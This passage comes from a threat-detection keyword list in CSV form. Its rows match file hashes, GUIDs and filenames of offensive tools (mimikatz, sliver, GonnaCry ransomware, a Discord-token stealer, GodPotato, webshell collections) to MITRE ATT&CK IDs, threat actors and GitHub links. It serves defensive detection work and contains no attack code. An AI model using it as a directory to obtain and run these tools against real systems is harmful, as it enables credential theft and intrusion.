"*2fa02db89575d18c68adbe39e2db1565d9d688adce00b3ba85d6407d3b0cc911*",".{0,1000}2fa02db89575d18c68adbe39e2db1565d9d688adce00b3ba85d6407d3b0cc911.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24111" "*2fa193f29d79be4213c7310cb815f08c4c426ba02720d598f79ac0f69fe999ca*",".{0,1000}2fa193f29d79be4213c7310cb815f08c4c426ba02720d598f79ac0f69fe999ca.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24112" "*2fa97965c5491fd73b586656a2a3d376013fa20918cc501f598439b85e49e244*",".{0,1000}2fa97965c5491fd73b586656a2a3d376013fa20918cc501f598439b85e49e244.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","#filehash","N/A","10","","N/A","","","","24114" 
"*2fb873b8303300b7a5df14c5bf0271118343bc20c3f36208148b5e4966c47a36*",".{0,1000}2fb873b8303300b7a5df14c5bf0271118343bc20c3f36208148b5e4966c47a36.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","24117" "*2FB94059-2D49-4EEA-AAF8-7E89E249644B*",".{0,1000}2FB94059\-2D49\-4EEA\-AAF8\-7E89E249644B.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","24118" "*2fbc59378c66069942a5b99d32551d080f7f8a984e568c7b408e6c7b67bdebff*",".{0,1000}2fbc59378c66069942a5b99d32551d080f7f8a984e568c7b408e6c7b67bdebff.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","24119" "*2fbf10428ccc2e463e88aae2aadd3efdf686d510c42d7b5aca2b4f126bb8296f*",".{0,1000}2fbf10428ccc2e463e88aae2aadd3efdf686d510c42d7b5aca2b4f126bb8296f.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","24120" 
"*2fbf1231cc622fd4b910a7fc7b474af1dcd1acbdc13b8233b852416009b9bb20*",".{0,1000}2fbf1231cc622fd4b910a7fc7b474af1dcd1acbdc13b8233b852416009b9bb20.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24121" "*2fbf1231cc622fd4b910a7fc7b474af1dcd1acbdc13b8233b852416009b9bb20*",".{0,1000}2fbf1231cc622fd4b910a7fc7b474af1dcd1acbdc13b8233b852416009b9bb20.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24122" "*2fc0adccdf3683c94c1e6c47274e567d980a576f89e8b9672a98de04528eb348*",".{0,1000}2fc0adccdf3683c94c1e6c47274e567d980a576f89e8b9672a98de04528eb348.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","24123" "*2fc2426035652b2ecfc952407b4d22ab78b9ae554da8f2466bccf48fa2a3870a*",".{0,1000}2fc2426035652b2ecfc952407b4d22ab78b9ae554da8f2466bccf48fa2a3870a.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","24125" "*2fc4590134d1420bbac69beeed06c448f185b59c2856781966b33d7d6fda78e3*",".{0,1000}2fc4590134d1420bbac69beeed06c448f185b59c2856781966b33d7d6fda78e3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24126" "*2fc6ab3630221478642ba96c1adf85136582e83bf9d935216ed8a7b96343cce1*",".{0,1000}2fc6ab3630221478642ba96c1adf85136582e83bf9d935216ed8a7b96343cce1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","24127" "*2fcac3a62e1125dcdad1f7e2681de4ed2e5dc01d474f1ee5b23d156a5116d510*",".{0,1000}2fcac3a62e1125dcdad1f7e2681de4ed2e5dc01d474f1ee5b23d156a5116d510.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","24128" "*2fd04964c571de856492e42f27043367c4b8e452a7f4719a1bdb0470b2b6576c*",".{0,1000}2fd04964c571de856492e42f27043367c4b8e452a7f4719a1bdb0470b2b6576c.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#filehash","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","24129" 
"*2fd282cb4a91d1d4f3203bb55965efd86e8fecabf8594a3cd785552b6369eb7f*",".{0,1000}2fd282cb4a91d1d4f3203bb55965efd86e8fecabf8594a3cd785552b6369eb7f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24130" "*2fd7939a7484f5959d7de4e7a5f047de8df3e2e8faeb6f6f90d0bd2dbee5a0b4*",".{0,1000}2fd7939a7484f5959d7de4e7a5f047de8df3e2e8faeb6f6f90d0bd2dbee5a0b4.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","24131" "*2fd99d56b4565653d6d39f1bd747dd14d24aa4d5882dc237da165974791b513c*",".{0,1000}2fd99d56b4565653d6d39f1bd747dd14d24aa4d5882dc237da165974791b513c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24132" "*2fe32ea10b81598147f6d39cc0ae54a03a5384c73d1fba22fc3f9ae6589ec266*",".{0,1000}2fe32ea10b81598147f6d39cc0ae54a03a5384c73d1fba22fc3f9ae6589ec266.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - 
T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","24135" "*2fe3e062aad09c372500bdef858a32344d95c7b8036d4cb5f0091a2db17b446f*",".{0,1000}2fe3e062aad09c372500bdef858a32344d95c7b8036d4cb5f0091a2db17b446f.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","#filehash","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","24136" "*2fe5dc013f99c83e5c353ab5a064ad0ce2f197debb7b03f430934004923f6071*",".{0,1000}2fe5dc013f99c83e5c353ab5a064ad0ce2f197debb7b03f430934004923f6071.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","#filehash","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","24137" "*2FE6C1D0-0538-48DB-B4FA-55F0296A5150*",".{0,1000}2FE6C1D0\-0538\-48DB\-B4FA\-55F0296A5150.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","#GUIDproject","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","24138" "*2fea83d7bfccf5b1e8a5047b27d872bcfb18f5aa4ab71e038c4f56554ee2f108*",".{0,1000}2fea83d7bfccf5b1e8a5047b27d872bcfb18f5aa4ab71e038c4f56554ee2f108.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24139" "*2feda61b4bfe2c6f693f3201ddaec6f08a2df01c63234e933d9041a2e37a7045*",".{0,1000}2feda61b4bfe2c6f693f3201ddaec6f08a2df01c63234e933d9041a2e37a7045.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24142" "*2fef430e1b4c0fd66bcacefb5b90e7ea1b036dc377dbaa0d5543e429b71aea76*",".{0,1000}2fef430e1b4c0fd66bcacefb5b90e7ea1b036dc377dbaa0d5543e429b71aea76.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24143" "*2ff4c6949bab3ffb8c95b21f9c5eb597b93af66e3bfb635ba2bf92fd534e995b*",".{0,1000}2ff4c6949bab3ffb8c95b21f9c5eb597b93af66e3bfb635ba2bf92fd534e995b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - 
TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24146" "*2ff4c6949bab3ffb8c95b21f9c5eb597b93af66e3bfb635ba2bf92fd534e995b*",".{0,1000}2ff4c6949bab3ffb8c95b21f9c5eb597b93af66e3bfb635ba2bf92fd534e995b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - 
Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24147" "*2ff605e64eb4fa723b59b90f9ef36c5aeb4332695367697e91997a5b6dc463ba*",".{0,1000}2ff605e64eb4fa723b59b90f9ef36c5aeb4332695367697e91997a5b6dc463ba.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","24148" "*2ffb7bfe8f888c083361a65e7a8a349ba1f6b16971522011f545029fb20b3fd1*",".{0,1000}2ffb7bfe8f888c083361a65e7a8a349ba1f6b16971522011f545029fb20b3fd1.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#filehash","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","24149" "*2ffc8e93d89c9f9c090df5e44eb7921633c6954176b06183acbd459369a919b8*",".{0,1000}2ffc8e93d89c9f9c090df5e44eb7921633c6954176b06183acbd459369a919b8.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","24150" "*2Ftun2socks*",".{0,1000}2Ftun2socks.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - 
T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#content","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24151" "*2john.c",".{0,1000}2john\.c","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","24152" "*2john.lua*",".{0,1000}2john\.lua.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","24153" "*2john.pl*",".{0,1000}2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","24154" "*2john.py*",".{0,1000}2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","24155" "*3000b91468e3961b4e1a9ecd07007bfe02f50033d0d4a71dfb4e5b1de778bd13*",".{0,1000}3000b91468e3961b4e1a9ecd07007bfe02f50033d0d4a71dfb4e5b1de778bd13.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - 
T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","24156" "*3002ae0a5cc844b862c99f1d561f9530df8d6259f970d038baeac665a153b91c*",".{0,1000}3002ae0a5cc844b862c99f1d561f9530df8d6259f970d038baeac665a153b91c.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","24159" "*3002cc4ccf57741919e563283d63b762f29512aafe16837b297c6d70e014bd04*",".{0,1000}3002cc4ccf57741919e563283d63b762f29512aafe16837b297c6d70e014bd04.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24160" "*300875180931c7f9f62908e72395f992510eea9e*",".{0,1000}300875180931c7f9f62908e72395f992510eea9e.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. 
that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","24161" "*3010a92d74293dc8e410f48f329b221230818b206f57fda830acb449bd53497d*",".{0,1000}3010a92d74293dc8e410f48f329b221230818b206f57fda830acb449bd53497d.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","24162" "*30250e5814a1c0735d0f260d69ae237636f795f6a425ad2162d18a758e0fef1f*",".{0,1000}30250e5814a1c0735d0f260d69ae237636f795f6a425ad2162d18a758e0fef1f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24164" "*3027a212272957298bf4d32505370fa63fb162d6a6a6ec091af9d7626317a858*",".{0,1000}3027a212272957298bf4d32505370fa63fb162d6a6a6ec091af9d7626317a858.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","24165" "*3027a212272957298bf4d32505370fa63fb162d6a6a6ec091af9d7626317a858*",".{0,1000}3027a212272957298bf4d32505370fa63fb162d6a6a6ec091af9d7626317a858.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","24166" "*303d4a01829c4696281be3b506ed99c978f5cd2a093af588b6a6aa7d5eee2096*",".{0,1000}303d4a01829c4696281be3b506ed99c978f5cd2a093af588b6a6aa7d5eee2096.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
